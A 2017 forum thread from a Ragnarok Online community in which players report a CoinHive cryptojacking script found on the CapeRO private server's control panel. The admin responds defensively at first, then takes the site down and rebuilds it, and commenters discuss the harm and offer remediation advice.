RateMyServer Ragnarok Community

RateMyServer.Net => Server Discussion => Rant and Rave => Topic started by: Fluorite~ on Dec 30, 2017, 09:53 PM

Title: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 09:53 PM
Upon accessing CapeRO's website, I was alerted by my antivirus that it had stopped a CoinHive script from running.  After checking the page source, there is definitely a CoinHive script integrated on its Main Page/Patcher.
https://i.imgur.com/U4Jad9W.png (https://i.imgur.com/U4Jad9W.png)

For those of you who are unaware, CoinHive is a Javascript that activates when a user accesses a webpage.  When it runs, it does so without the user's permission and consumes their processor's resources in a cryptocurrency mining operation.
https://blog.malwarebytes.com/security-world/2017/10/why-is-malwarebytes-blocking-coinhive/ (https://blog.malwarebytes.com/security-world/2017/10/why-is-malwarebytes-blocking-coinhive/)
https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/ (https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/)

When the admin was asked about it, CapeRO said it was "a common problem with Ragnarok Thor Patchers + Windows Update" (it isn't) and seemed to suggest it was the fault of viruses present in a player, closing the topic shortly afterwards.
https://cape-ro.com/forum/index.php?/topic/283-troyan-inside-cape-ro-patcher/?p=1561 (https://cape-ro.com/forum/index.php?/topic/283-troyan-inside-cape-ro-patcher/?p=1561)
Image copies of the discussion:
https://i.imgur.com/dALXcpo.png (https://i.imgur.com/dALXcpo.png)
https://i.imgur.com/mPbnojY.png (https://i.imgur.com/mPbnojY.png)

I can understand the need for income when running an RO server, but unauthorized usage of your unsuspecting userbase's computers is not a path to walk down.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 10:17 PM
We checked the patcher files and couldn't even find this. Based on the domain on your screenshot; It's not even the patcher's domain.. That's the Control Panel's Domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from, If you have a good source of accurate information then let us know because we didn't build this website ourself, it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find someting we'll definitely fix it right away.

ps: If you're a legit forum member, you'll know that everytime I answer reports / suggestions i would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something todo with the Control Panel. We will Investigate further.
Update#3 Website has been put under-maintenance for re-construction and fixing of whatever error there is.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 10:22 PM
I don't know about the patcher, but it's definitely on the main control panel, starting at line 63 in the page source. view-source:https://cape-ro.com/cp/ I was keeping an eye on this server, sad to see.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 10:32 PM
We checked the patcher files and couldn't even find this. Based on the domain on your screenshot; It's not even the patcher's domain.. That's the Control Panel's Domain. Maybe you should link us to the actual findings rather than accusing us of doing these purposely. We have bought an SSL Certificate to give an extra assurance to our players. We have no idea where this is coming from, If you have a good source of accurate information then let us know because we didn't build this website ourself, it's a made website bought from s1Lykos.

However, we will keep investigating the issue and if we do find someting we'll definitely fix it right away.

ps: If you're a legit forum member, you'll know that everytime I answer reports / suggestions i would close the topic right away to keep the forum clean at all times.

Update#1 The report was about the Patcher which we found nothing wrong with.
Update#2 This issue might be something todo with the Control Panel. We will Investigate further.
Update#3 Website has been put under-maintenance for re-construction and fixing of whatever error there is.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:06 PM
Quote from: Fluorite~ on Dec 30, 2017, 10:53 PM
Wouldn't know too much about the Patcher's files itself (haven't downloaded your server's files), but if the Patcher in any way links to your website, then the issue is bound to be associated with your Patcher and would also generate hits anytime someone executes it.  The info I got about the Patcher was based off the forum report (which I'm not a member of), though it is kind of strange that you told the player to make an exception for what they told you was a Bitcoin mining script.

I've also sent an inquiry to s1 Lykos over how this could have been implemented on only your website's design.

I see, so you basically just randomly figured out that there is a problem with the patcher without even trying it. Is it really strange to tell them that if I found nothing wrong with the Server's Patcher? Thor patchers does have problems with anti-viruses because it's detecting it as false alarm.  If the report was on-point and see the bug then we would have fixed it right away. The problem wasn't coming from the Thor Patcher but the website coding itself. It did not affect anybody and no harm was done. We're just putting the site / cp on maintenance to make sure everything will be alright and safe.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Fluorite~ on Dec 30, 2017, 11:27 PM
Why would anyone even attempt to download a Patcher that is suspected to be infected...?

As for it being an issue with Windows Defender + Thor Patchers, that is horribly misinformed.  When there are issues with Thor Patchers being detected as trojans, it's a detected issue with the Patcher's files itself, not a BitCoin miner like CoinHive as stated in the forum report.  Elvarion and Puddles in that forum report even gave huge leads as to what the real problem was in that report before it was closed.  It was negligent to throw that under the umbrella statement of being a false positive detection and moving on.

Regardless, the website has/had an active CoinHive Javascript for any visitors.  Whether it's yours or not is not something I can confirm, but it was positively running on your website and tapping into their computer's resources as a result.  It's good of you to respond to the problem immediately.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:32 PM
Quote from: Kurisuga on Dec 30, 2017, 11:24 PM
Patchers fetch data from main pages/cp all the time, especially for things like news updates about the server. When the patcher itself is opened, it most likely is using their pc for mining without permission, same as if it was opened in a browser. How can you say no harm was done, it's still on the cp regardless of if it worked correctly on the patcher. Why are you being hostile instead of apologetic for putting your playerbase at risk?

Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 30, 2017, 11:38 PM
Quote from: CapeRO on Dec 30, 2017, 11:32 PM
Oh, Did someone already tell you they lost anything? Far as I'm concerned there's not a single report given to me that they have lost anything.  If someone did, I would take full responsibility and like I mentioned in the previous comment " We have bought SSL Certificate " which RO Private sites rarely bother buying.

We are doing our job right now. Website will be back LIVE tonight fixed and cleaner.  Not sure if you guys will continue the issue but it's being taken care of carefully.

I'm not sure if you're being willfully ignorant or not of the extra strain it puts on peoples PC's to mine bitcoin, along with power consumption. A lot of RO players run on old clunky pc's or toasters. That extra strain could easily mess up their pc's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 30, 2017, 11:57 PM
Quote from: Kurisuga on Dec 30, 2017, 11:38 PM
I'm not sure if you're being willfully ignorant or not of the extra strain it puts on peoples PC's to mine bitcoin, along with power consumption. A lot of RO players run on old clunky pc's or toasters. That extra strain could easily mess up their pc's components over time, and over time could equate to hundreds of dollars in extra power bills.

P.S. How would they even know they've lost anything when it's hidden on the website itself, most people are unaware of these risks and that's why they are targets of things like coin.hive

I also run on old chunky pc myself or "toasters". I have no idea what this coin-hive but it sounds like some online currency so if people loses whatever currency that is then that's how we basically find out. We're not even sure if this is functioning or what so we can't judge if anybody is infected or not by just brain storming it.

But we are doing what we need to do, We're fixing whatever issue there is.

PS: I don't get the accusations really. Why would we Install SSL Certificates if this was intentional.
"SSL Certificates are small data files that digitally bind a cryptographic key to an organization's details. When installed on a web server, it activates the padlock and the https protocol (over port 443) and allows secure connections from a web server to a browser."

Update 1: I just read the info about it so it's not about losing peoples currency. Still not-sure how it functions but it's being dealt with.
Update 2: I run on Chunky PC and never experience slowing down. ( I visit this site like 1,000 a day )

Thanks for reporting this and actions are being worked on.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Kurisuga on Dec 31, 2017, 12:09 AM
The script makes the pc "create" the online currency by solving very long and taxing algorithms at the expense of their GPU/CPU use. The currency created goes into the pockets of whoever infected the control panel at the expense of the website visitors power bill and pc processing power, which could overtax the parts over time. Sorry about the accusations, but it just really is damaging, especially because majority of people wont ever know they were being taken advantage of in the first place.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 12:13 AM
Yeah I just read the information about it.

Thank you everybody for your concern. Website has been put under-maintenance fo full check & fixing. I'll give an update when it's back.
If anybody has further issues please contact me at [email protected] . Regards.

ps: WEBSITE IS SAFE to Browse as we have taken down the CP. ( check all your want )
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Parachute on Dec 31, 2017, 02:32 AM
I have not downloaded the server's patcher nor visited your site. Not to mention, I don't know where you installed your thor patcher, but in my case, I got this report accessing your site just now:

https://forumcgamershub-com-s3.s3.amazonaws.com/original/2X/6/6dd744dd6d53b4197d731a801786773ee45a0d68.png

Meaning regardless if you put your website under maintenance, the damage has already been done. Your domain name had been listed as infected site.

I'm not here to put more drama on this thread, but to give an advice as a Cybersecurity student. Please contact (uhm a lot of) Anti-malware protection/sites as they considered and listed your site as a dangerous webpage. If your users could not see this notice, then they probably doesn't have a decent protection in their devices/browsers. If they do, they may not access your site without warning and you might lose some interested players. So 2 probable solutions:

1. contact A LOT of anti-malware companies
2. change your domain name

Having HTTPS (SSL) does not protect your website from these attacks. SSL establishes encrypted link between your user's browser and your website to make sure all data passed down remain private. main reason why it's generally installed in Shop's checkout and cart webpages. But in no way an SSL protects your site with these type of attacks (if you had been the victim of such). You can even pay for a much more expensive certificate and still be vulnerable to these kind of threats. In this case, there's a totally different protection for that.

Due to the recent growth of Cryptocurrency, here comes the new trend for the past 3 months called "Cryptojacking." And yes, one of its pioneers is a company called CoinHive. What it does is self-explanatory - It secretly uses the user's laptop, pc or even mobile devices to mine cryptocurrency whenever you visit an infected site. But ofc, Anti-Malware companies are not slow on their side, they instantly detected this. But the only thing I do not understand, Usually hackers tend to attack and infect big websites with a bunch of daily user visitors, not an RO website. So I just hope you did not add this javascript - which as it seems you have no idea how it gotten there. Either way, there has to be a culprit.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 02:43 AM
Thanks for the advice, I will make contacts with anti-malware companies. I have deleted all other files except Forums and cleaned it up. Only issue would be the one you posted above about the warning. I'm not sure also why would they have an interest with an RO website but hopefully our fix will solve all the issues. Regards.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: Parachute on Dec 31, 2017, 02:45 AM
Quote from: CapeRO on Dec 31, 2017, 02:43 AM
Thanks for the advice, I will make contacts with anti-malware companies. I have deleted all other files except Forums and cleaned it up. Only issue would be the one you posted above about the warning. I'm not sure also why would they have an interest with an RO website but hopefully our fix will solve all the issues. Regards.

Glad to hear, hope you make the best out of it. Goodluck!
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: NoiI on Dec 31, 2017, 07:47 AM
Hello everyone

I am Puddles of the aformentioned posts.
This topic is exaggerating much coin have can't damage your pc or harm it in any way. Your browser is executing javascript in it's own sandboxed environment what it does constantly while browsing so the browser vendors are concered you are safe while doing it. Cryptocurrencies ensure their safety by solving large puzzles where many pcs have to be part on to even make a legit transaction - lending them your computing power will give you a super small fraction of the outcome of the transaction kinda like taxes. So it is not even the intention to harm your pc the guy whoever that is putted the coinhive there was just after the money of those transaction taxes.

The guy I mentioned could even be the provider of your webhosting inserting javascript on the end of your pages to make up for his super low prices or something.

Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 08:22 AM
Update from Forum News @ www.cape-ro.com/forum (http://www.cape-ro.com/forum) :

Greetings!

After almost half a day, our website is finally back & fixed with a New Design ( well not so new because this is a quick pre-made bought today )

Short explanation:
The previous website design had a little problem that's why we rushed to buy a new pre-made one that is more secured. This pre-made website is functioning well but we may not keep this design because it's too basic.

If anyone encounters any trouble, please let me know.

Regards.

Update Here on RMS:

Any possible erros has been removed and we're keeping our eyes in it. We may change domain name for false warning caused by it but for now the Website is Cleaned,Freshed and well functioning!

Feel free to test our and tell me if you find anymore problems :) Thanks RMS Community!

www.cape-ro.com (http://www.cape-ro.com)
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: ggwp on Dec 31, 2017, 09:19 PM
If you bought the previous control panel , you should ask the one that made it. Then look who have access to server to edit control panel. This is serious problem and the culprit need to be found to prevent the same thing happening.

The one that add that coinhive script to your control panel is profiting money from the user. The script running cryptomining task using user computing process. For toaster rig this is dangerous because most the time it will run their rig to 100% and will shorten your user hardware life. For player with better rig they "only" waste more $$ for electricity because their rig run more than the usual. For every $1 your user waste on electricity cost when running the script that culprit get around $0,1.
Title: Re: CapeRO's CoinHive Javascript: Using its players to mine cryptocurrency
Post by: CapeRO on Dec 31, 2017, 09:52 PM
It's all sorted and we're monitoring it every moment closely to prevent any errors from happening.

Happy New Year!

CapeRO
www.cape-ro.com (http://www.cape-ro.com)